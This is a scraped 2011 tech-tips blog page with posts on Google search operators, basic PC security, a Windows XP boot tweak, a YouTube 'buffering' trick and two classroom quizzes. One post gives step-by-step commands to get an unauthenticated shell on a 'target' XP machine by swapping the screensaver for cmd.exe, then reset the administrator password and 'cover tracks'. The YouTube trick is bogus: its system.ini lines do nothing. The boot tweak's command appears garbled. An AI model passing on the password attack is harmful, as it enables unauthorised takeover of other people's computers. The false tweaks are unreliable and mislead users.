20 Great Google Secrets
Friday, September 16, 2011 - Labels: computer, Google - 0 Comments
Google is clearly the best general-purpose search engine on the Web (see
www.pcmag.com/searchengines
But most people don't use it to its best advantage. Do you just plug in a keyword or two and hope for the best? That may be the quickest way to search, but with more than 3 billion pages in Google's index, it's still a struggle to pare results to a manageable number.
But Google is an remarkably powerful tool that can ease and enhance your Internet exploration. Google's search options go beyond simple keywords, the Web, and even its own programmers. Let's look at some of Google's lesser-known options.
Syntax Search Tricks
Using a special syntax is a way to tell Google that you want to restrict your searches to certain elements or characteristics of Web pages. Google has a fairly complete list of its syntax elements at
www.google.com/help/operators.html
. Here are some advanced operators that can help narrow down your search results.
Intitle: at the beginning of a query word or phrase (intitle:"Three Blind Mice") restricts your search results to just the titles of Web pages.
Intext: does the opposite of intitle:, searching only the body text, ignoring titles, links, and so forth. Intext: is perfect when what you're searching for might commonly appear in URLs. If you're looking for the term HTML, for example, and you don't want to get results such as
www.mysite.com/index.html
, you can enter intext:html.
Link: lets you see which pages are linking to your Web page or to another page you're interested in. For example, try typing in
link:http://www.pcmag.com
Try using site: (which restricts results to top-level domains) with intitle: to find certain types of pages. For example, get scholarly pages about Mark Twain by searching for intitle:"Mark Twain"site:edu. Experiment with mixing various elements; you'll develop several strategies for finding the stuff you want more effectively. The site: command is very helpful as an alternative to the mediocre search engines built into many sites.
Swiss Army Google
Google has a number of services that can help you accomplish tasks you may never have thought to use Google for. For example, the new calculator feature
(www.google.com/help/features.html#calculator)
10 Fast and Free Security Enhancements
- Labels: computer, Security - 0 Comments
Before you spend a dime on security, there are many precautions you can take that will protect you against the most common threats.
1. Check Windows Update and Office Update regularly (_http://office.microsoft.com/productupdates); have your Office CD ready. Windows Me, 2000, and XP users can configure automatic updates. Click on the Automatic Updates tab in the System control panel and choose the appropriate options.
2. Install a personal firewall. Both SyGate (_www.sygate.com) and ZoneAlarm (_www.zonelabs.com) offer free versions.
3. Install a free spyware blocker. Our Editors' Choice ("Spyware," April 22) was SpyBot Search & Destroy (_http://security.kolla.de). SpyBot is also paranoid and ruthless in hunting out tracking cookies.
4. Block pop-up spam messages in Windows NT, 2000, or XP by disabling the Windows Messenger service (this is unrelated to the instant messaging program). Open Control Panel | Administrative Tools | Services and you'll see Messenger. Right-click and go to Properties. Set Start-up Type to Disabled and press the Stop button. Bye-bye, spam pop-ups! Any good firewall will also stop them.
5. Use strong passwords and change them periodically. Passwords should have at least seven characters; use letters and numbers and have at least one symbol. A decent example would be f8izKro@l. This will make it much harder for anyone to gain access to your accounts.
6. If you're using Outlook or Outlook Express, use the current version or one with the Outlook Security Update installed. The update and current versions patch numerous vulnerabilities.
7. Buy antivirus software and keep it up to date. If you're not willing to pay, try Grisoft AVG Free Edition (Grisoft Inc., w*w.grisoft.com). And doublecheck your AV with the free, online-only scanners available at w*w.pandasoftware.com/activescan and _http://housecall.trendmicro.com.
8. If you have a wireless network, turn on the security features: Use MAC filtering, turn off SSID broadcast, and even use WEP with the biggest key you can get. For more, check out our wireless section or see the expanded coverage in Your Unwired World in our next issue.
9. Join a respectable e-mail security list, such as the one found at our own Security Supersite at _http://security.ziffdavis.com, so that you learn about emerging threats quickly and can take proper precautions.
10. Be skeptical of things on the Internet. Don't assume that e-mail "From:" a particular person is actually from that person until you have further reason to believe it's that person. Don't assume that an attachment is what it says it is. Don't give out your password to anyone, even if that person claims to be from "support."
How to BOOT Windows XP FASTER w/o using any Software
Thursday, September 15, 2011 - Labels: boot, Windows, XP - 0 Comments
First of all, this tweak only apply to those who only have one HDD on their primary IDE channel (nothing else on device 0 or 1) and a CD-ROM and/or DVD-ROM on the secondary IDE channel. Each time you boot Windows XP, there's an updated file called NTOSBOOT-*.pf who appears in your prefetch directory (%SystemRoot%Prefetch) and there's no need to erase any other files as the new prefetch option in XP really improves loading time of installed programs. We only want WindowsXP to boot faster and not decrease its performance.
Thanks to Rod Cahoon (for the prefetch automation process...with a minor change of mine) and Zeb for the IDE Channel tweak as those two tricks, coupled together with a little modification, result in an EXTREMELY fast bootup:
Steps:
1. Open notepad.exe, type "del c:windowsprefetch tosboot-*.* /q" (without the quotes) & save as "ntosboot.bat" in c:
2. From the Start menu, select "Run..." & type "gpedit.msc".
3. Double click "Windows Settings" under "Computer Configuration" and double click again on
"Shutdown" in the right window.
4. In the new window, click "add", "Browse", locate your "ntosboot.bat" file & click "Open".
5. Click "OK", "Apply" & "OK" once again to exit.
6. From the Start menu, select "Run..." & type "devmgmt.msc".
7. Double click on "IDE ATA/ATAPI controllers"
8. Right click on "Primary IDE Channel" and select "Properties".
9. Select the "Advanced Settings" tab then on the device 0 or 1 that doesn't have 'device type'
greyed out select 'none' instead of 'autodetect' & click "OK".
10. Right click on "Secondary IDE channel", select "Properties" and repeat step 9.
11. Reboot your computer.
WindowsXP should now boot REALLY faster.
How to hack Windows XP Admin Password
- Labels: computer, hacking, Windows, XP - 0 Comments
If you log into a limited account on your target machine and open up a dos prompt
then enter this set of commands Exactly:
cd\ *drops to root
cd\windows\system32 *directs to the system32 dir
mkdir temphack *creates the folder temphack
copy logon.scr temphack\logon.scr *backsup logon.scr
copy cmd.exe temphack\cmd.exe *backsup cmd.exe
del logon.scr *deletes original logon.scr
rename cmd.exe logon.scr *renames cmd.exe to logon.scr
exit *quits dos
Now what you have just done is told the computer to backup the command program
and the screen saver file, then edits the settings so when the machine boots the
screen saver you will get an unprotected dos prompt with out logging into XP.
Once this happens if you enter this command minus the quotes
"net user
If the Administrator Account is called RYAN and you want the password hmx_ryan enter this
"net user RYAN hmx_ryan"
and this changes the password on RYAN's machine to hmx_ryan and your in.
Enjoy Guys...
PS: Don't forget to copy the contents of temphack back into the system32 dir to cover tracks
THANK YOU
How to speed Up Youtube Buffering Speed!
- Labels: computer, Speed, Youtube - 0 Comments
This procedure is intended to speed up buffering speed when you watch videos
Steps:
a) click start
b) click run
c) in the box type system.ini
You should get system notepad file with this inside
Code:
; [drivers]
wave=mmdrv.dll
timer=timer.drv
[mci]
[driver32]
[386enh]
woafont=dosapp.FON
EGA80WOA.FON=EGA80WOA.FON
EGA40WOA.FON=EGA40WOA.FON
CGA80WOA.FON=CGA80WOA.FON
CGA40WOA.FON=CGA40WOA.FON
just below this lines copy and paste this
Code:
page buffer=1000000Tbps
load=1000000Tbps
download=1000000Tbps
save=1000000Tbps
back=1000000Tbps
search=1000000Tbps
sound=1000000Tbps
webcam=1000000Tbps
voice=1000000Tbps
faxmodemfast=1000000Tbps
update=1000000Tbps
The final result should look like this
Code:
; [drivers]
wave=mmdrv.dll
timer=timer.drv
[mci]
[driver32]
[386enh]
woafont=dosapp.FON
EGA80WOA.FON=EGA80WOA.FON
EGA40WOA.FON=EGA40WOA.FON
CGA80WOA.FON=CGA80WOA.FON
CGA40WOA.FON=CGA40WOA.FON
page buffer=1000000Tbps
load=1000000Tbps
download=1000000Tbps
save=1000000Tbps
back=1000000Tbps
search=1000000Tbps
sound=1000000Tbps
webcam=1000000Tbps
voice=1000000Tbps
faxmodemfast=1000000Tbps
update=1000000Tbps
Click Here to Say Thanks.THANK YOU
Google Cool!
- Labels: computer, Cool, Google - 0 Comments
1) Go to Google,and type 'Google Gravity'.
2) Click on the 1st result that appears i.e. Google Gravity
3) Wait 2 seconds. Something cool will happen!
4) Play with it for a while.
5) Then write any word in the Google search bar and press Enter.
6) Wait and see. Something even cooler will happen. Awesome!!
Click Here to Say Thanks.
THANK YOU
IT402 QUIZ No. 2 About Tables
- Labels: HTML, HTML Tables, Quiz - 0 Comments
Before to proceed to your quiz, kindly click this:
then do this quiz...
Table 1
Title goes here | ||
A | C | E |
B | D | F |
Table 2
Title goes here | A | D |
B | E | |
C | F |
Table 3
Title goes here | A | D |
B | E | |
C | F |
Table 4
Title goes here | A | D |
B | E | |
C | F |
Table 5
Title goes here | A | B | ||
C | D | E | F | G |
H | I | J | ||
K | L | M | ||
N | O |
SQL Quiz # 1
- - 0 Comments
StudentID | Fname | MI | Lname | Gender | YearLevel | SecName |
| | | | | | |
1 | Ely | B | Buendia | M | 1 | A |
2 | Bab | C | Lamoun | M | 2 | B |
3 | Jolen | C | Lamoun | F | 1 | A |
4 | Dagul | S | Sungcal | M | 2 | A |
5 | Barbie | L | Sabaybunot | F | 1 | B |
6 | Tiny | S | Sungcal | F | 3 | C |
7 | Brosia | M | Tangara | F | 3 | D |
8 | Paltik | L | Sabaybunot | M | 2 | D |
9 | Utoy | S | Sungcal | M | 4 | A |
10 | Noli | M | Tangere | M | 3 | C |
11 | Mao | D | Tsetung | M | 1 | D |
12 | Tomas | L | Sabaybunot | M | 4 | D |
13 | Pao | D | Tsetung | F | 3 | C |
14 | Sonia | C | Blade | F | 2 | A |
15 | Polgas | L | Cotto | M | 4 | A |
Create the following queries:
a. Query1 – for all students’ last name
b. Query2 – for all students in descending record by their StudentID
c. Query3 – for all female students
d. Query4 – for all male students
e. Query5 – for all female students in second year level
f. Query6 – for all male students in first and third year level
g. Query7 – for all students whose last name starts with letter S
h. Query8 – for all students in sections 1A and 4A
i. Query9 – for all students in sections 2B and 3C
j. Query10 – for all students in sections 4D and 1C
k. Query11 – for all students in section A only
l. Query12 – number of students’ records in the list
m. Query13 – all unique sections